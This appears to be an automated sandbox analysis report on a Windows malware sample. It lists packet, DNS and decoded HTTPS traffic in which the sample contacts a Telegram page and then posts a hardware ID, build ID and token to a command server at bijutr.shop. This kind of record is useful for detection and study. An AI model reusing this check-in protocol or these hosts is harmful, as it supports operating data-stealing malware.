                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:36.867281914 CET59230443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:37.815097094 CET59230443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:37.815175056 CET59230443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:37.876816034 CET59230443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:37.876935005 CET59230443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:37.876987934 CET59230443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:37.877257109 CET5583453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:37.877414942 CET5154453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:37.877481937 CET59230443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:37.877521992 CET59230443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:37.877592087 CET59230443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:37.877621889 CET59230443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:37.877758026 CET6251453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:37.877892017 CET5556853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:37.877980947 CET59230443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:37.878019094 CET59230443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:38.001734018 CET44359230172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:38.002302885 CET59230443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:38.032926083 CET59230443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:38.130649090 CET44359230172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:38.130659103 CET44359230172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:38.130675077 CET44359230172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:38.130686045 CET44359230172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:38.130974054 CET59230443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:38.131042004 CET59230443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:38.131072044 CET59230443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:38.132061958 CET44359230172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:38.132169962 CET44359230172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:38.132683992 CET59230443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:38.190855026 CET44359230172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:38.191009998 CET44359230172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:38.191019058 CET44359230172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:38.191025972 CET44359230172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:38.191083908 CET59230443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:38.191174984 CET59230443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:38.191188097 CET44359230172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:38.191239119 CET44359230172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:38.191359997 CET44359230172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:38.191385984 CET44359230172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:38.191493034 CET59230443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:38.315918922 CET44359230172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:38.345449924 CET59230443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:38.444500923 CET44359230172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:38.470511913 CET59230443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:38.504391909 CET44359230172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:40.052908897 CET59230443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:40.053008080 CET59230443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:40.115166903 CET59230443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:40.115257025 CET59230443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:40.367533922 CET44359230172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:40.369204998 CET44359230172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:40.369324923 CET44359230172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:40.372571945 CET59230443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:40.431365013 CET44359230172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:40.433626890 CET44359230172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:40.434765100 CET44359230172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:40.435007095 CET59230443192.168.2.5172.64.41.3

                                                                                                                                                                                                                                                                        ICMP Packets

                                                                                                                                                                                                                                                                        TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:34.882188082 CET192.168.2.51.1.1.1c2b8(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:36.082954884 CET192.168.2.51.1.1.1c29b(Port unreachable)Destination Unreachable

                                                                                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:19:58.425059080 CET192.168.2.51.1.1.10x988bStandard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:00.714807034 CET192.168.2.51.1.1.10xc174Standard query (0)bijutr.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:17.431166887 CET192.168.2.51.1.1.10x2a9Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:17.431166887 CET192.168.2.51.1.1.10x7054Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:34.195646048 CET192.168.2.51.1.1.10x5ce3Standard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:34.195830107 CET192.168.2.51.1.1.10x5d09Standard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:36.865259886 CET192.168.2.51.1.1.10xccc6Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:36.865539074 CET192.168.2.51.1.1.10xda5aStandard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:37.849261045 CET192.168.2.51.1.1.10xb969Standard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:37.849858046 CET192.168.2.51.1.1.10xc33cStandard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:38.191853046 CET192.168.2.51.1.1.10x9465Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:38.192117929 CET192.168.2.51.1.1.10x5829Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:38.192800045 CET192.168.2.51.1.1.10x1173Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:38.193042040 CET192.168.2.51.1.1.10xa3aStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:38.220659018 CET192.168.2.51.1.1.10xd1b0Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:38.220896006 CET192.168.2.51.1.1.10x31beStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.535559893 CET192.168.2.51.1.1.10x65e3Standard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.535777092 CET192.168.2.51.1.1.10xb219Standard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.549813986 CET192.168.2.51.1.1.10x5910Standard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.550067902 CET192.168.2.51.1.1.10xe26aStandard query (0)assets.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:37.877257109 CET192.168.2.51.1.1.10x1163Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:37.877414942 CET192.168.2.51.1.1.10x72d5Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:37.877758026 CET192.168.2.51.1.1.10xe735Standard query (0)deff.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:37.877892017 CET192.168.2.51.1.1.10x9c3Standard query (0)deff.nelreports.net65IN (0x0001)false

                                                                                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:19:58.563771009 CET1.1.1.1192.168.2.50x988bNo error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:00.949089050 CET1.1.1.1192.168.2.50xc174No error (0)bijutr.shop188.245.216.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:17.568036079 CET1.1.1.1192.168.2.50x2a9No error (0)www.google.com172.217.21.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:17.569237947 CET1.1.1.1192.168.2.50x7054No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:34.332683086 CET1.1.1.1192.168.2.50x5ce3No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:34.333406925 CET1.1.1.1192.168.2.50x5d09No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:34.803924084 CET1.1.1.1192.168.2.50xaceNo error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:34.803924084 CET1.1.1.1192.168.2.50xaceNo error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:34.882097960 CET1.1.1.1192.168.2.50x4d77No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:37.003519058 CET1.1.1.1192.168.2.50xda5aNo error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:37.090673923 CET1.1.1.1192.168.2.50xccc6No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:37.986181974 CET1.1.1.1192.168.2.50xb969No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:37.986181974 CET1.1.1.1192.168.2.50xb969No error (0)googlehosted.l.googleusercontent.com142.250.181.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:37.986382961 CET1.1.1.1192.168.2.50xc33cNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:38.341435909 CET1.1.1.1192.168.2.50x9465No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:38.341435909 CET1.1.1.1192.168.2.50x9465No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:38.341459990 CET1.1.1.1192.168.2.50x5829No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:38.341470957 CET1.1.1.1192.168.2.50x1173No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:38.341470957 CET1.1.1.1192.168.2.50x1173No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:38.341481924 CET1.1.1.1192.168.2.50xa3aNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:38.564251900 CET1.1.1.1192.168.2.50xd1b0No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:38.564251900 CET1.1.1.1192.168.2.50xd1b0No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:38.564275026 CET1.1.1.1192.168.2.50x31beNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.672926903 CET1.1.1.1192.168.2.50x65e3No error (0)sb.scorecardresearch.com18.165.220.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.672926903 CET1.1.1.1192.168.2.50x65e3No error (0)sb.scorecardresearch.com18.165.220.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.672926903 CET1.1.1.1192.168.2.50x65e3No error (0)sb.scorecardresearch.com18.165.220.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.672926903 CET1.1.1.1192.168.2.50x65e3No error (0)sb.scorecardresearch.com18.165.220.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.686876059 CET1.1.1.1192.168.2.50xe26aNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.687206984 CET1.1.1.1192.168.2.50x5910No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:38.015116930 CET1.1.1.1192.168.2.50xe735No error (0)deff.nelreports.netdeff.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:38.015129089 CET1.1.1.1192.168.2.50x72d5No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:38.015275955 CET1.1.1.1192.168.2.50x9c3No error (0)deff.nelreports.netdeff.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:38.108674049 CET1.1.1.1192.168.2.50x1163No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false

                                                                                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                        • t.me
                                                                                                                                                                                                                                                                        • bijutr.shop
                                                                                                                                                                                                                                                                        • www.google.com
                                                                                                                                                                                                                                                                        • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                        • clients2.googleusercontent.com
                                                                                                                                                                                                                                                                        • https:
                                                                                                                                                                                                                                                                          • assets.msn.com
                                                                                                                                                                                                                                                                          • c.msn.com
                                                                                                                                                                                                                                                                          • sb.scorecardresearch.com
                                                                                                                                                                                                                                                                          • browser.events.data.msn.com
                                                                                                                                                                                                                                                                        • deff.nelreports.net
                                                                                                                                                                                                                                                                        • bzib.nelreports.net

                                                                                                                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        0192.168.2.549704149.154.167.994436584C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:20:00 UTC85OUTGET /k04ael HTTP/1.1
                                                                                                                                                                                                                                                                        Host: t.me
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        2024-12-27 07:20:00 UTC511INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx/1.18.0
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:20:00 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                        Content-Length: 12298
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: stel_ssid=5d3530a1156df5b8f3_6504403435824906820; expires=Sat, 28 Dec 2024 07:20:00 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Cache-control: no-store
                                                                                                                                                                                                                                                                        X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                                        Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                                                                        2024-12-27 07:20:00 UTC12298INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6b 30 34 61 65 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @k04ael</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        1192.168.2.549706188.245.216.2054436584C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:20:02 UTC231OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        2024-12-27 07:20:03 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:20:03 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2024-12-27 07:20:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        2192.168.2.549708188.245.216.2054436584C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:20:05 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----16FKXLF3EKF37YUAS0RI
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                        Content-Length: 256
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        2024-12-27 07:20:05 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 31 36 46 4b 58 4c 46 33 45 4b 46 33 37 59 55 41 53 30 52 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 38 33 37 32 36 39 35 31 32 31 36 32 32 33 35 37 33 34 35 32 36 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 31 36 46 4b 58 4c 46 33 45 4b 46 33 37 59 55 41 53 30 52 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 66 33 33 66 34 66 31 33 36 61 39 35 36 31 39 61 32 36 32 32 31 64 33 34 61 36 35 35 35 34 30 0d 0a 2d 2d 2d 2d 2d 2d 31 36 46 4b 58 4c 46 33 45 4b 46 33 37 59 55 41 53 30 52 49 2d 2d 0d
                                                                                                                                                                                                                                                                        Data Ascii: ------16FKXLF3EKF37YUAS0RIContent-Disposition: form-data; name="hwid"B837269512162235734526-a33c7340-61ca------16FKXLF3EKF37YUAS0RIContent-Disposition: form-data; name="build_id"9f33f4f136a95619a26221d34a655540------16FKXLF3EKF37YUAS0RI--
                                                                                                                                                                                                                                                                        2024-12-27 07:20:05 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:20:05 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2024-12-27 07:20:05 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 34 36 32 35 31 64 39 64 32 33 33 66 63 36 63 36 34 64 31 64 65 32 33 65 35 65 61 32 64 64 35 61 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 3a1|1|1|1|46251d9d233fc6c64d1de23e5ea2dd5a|1|1|1|0|0|50000|10


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        3192.168.2.549712188.245.216.2054436584C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:20:07 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----7Q9HDT2D26FU379ZC2NY
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        2024-12-27 07:20:07 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 37 51 39 48 44 54 32 44 32 36 46 55 33 37 39 5a 43 32 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 32 35 31 64 39 64 32 33 33 66 63 36 63 36 34 64 31 64 65 32 33 65 35 65 61 32 64 64 35 61 0d 0a 2d 2d 2d 2d 2d 2d 37 51 39 48 44 54 32 44 32 36 46 55 33 37 39 5a 43 32 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 66 33 33 66 34 66 31 33 36 61 39 35 36 31 39 61 32 36 32 32 31 64 33 34 61 36 35 35 35 34 30 0d 0a 2d 2d 2d 2d 2d 2d 37 51 39 48 44 54 32 44 32 36 46 55 33 37 39 5a 43 32 4e 59 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                        Data Ascii: ------7Q9HDT2D26FU379ZC2NYContent-Disposition: form-data; name="token"46251d9d233fc6c64d1de23e5ea2dd5a------7Q9HDT2D26FU379ZC2NYContent-Disposition: form-data; name="build_id"9f33f4f136a95619a26221d34a655540------7Q9HDT2D26FU379ZC2NYCont
                                                                                                                                                                                                                                                                        2024-12-27 07:20:08 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:20:08 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
